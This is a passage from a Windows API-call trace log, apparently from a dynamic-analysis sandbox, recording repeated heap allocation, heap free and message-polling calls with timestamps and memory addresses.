Flags=0x0, Size=0x8) returned 0xc01878 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.469] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.469] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.469] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.469] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.470] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.470] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.470] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.470] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.471] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.471] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.471] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.471] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.472] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.472] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.472] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.472] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.473] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.473] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.473] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.473] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.473] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.474] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019a8 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.474] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.474] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.474] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.475] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.475] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: 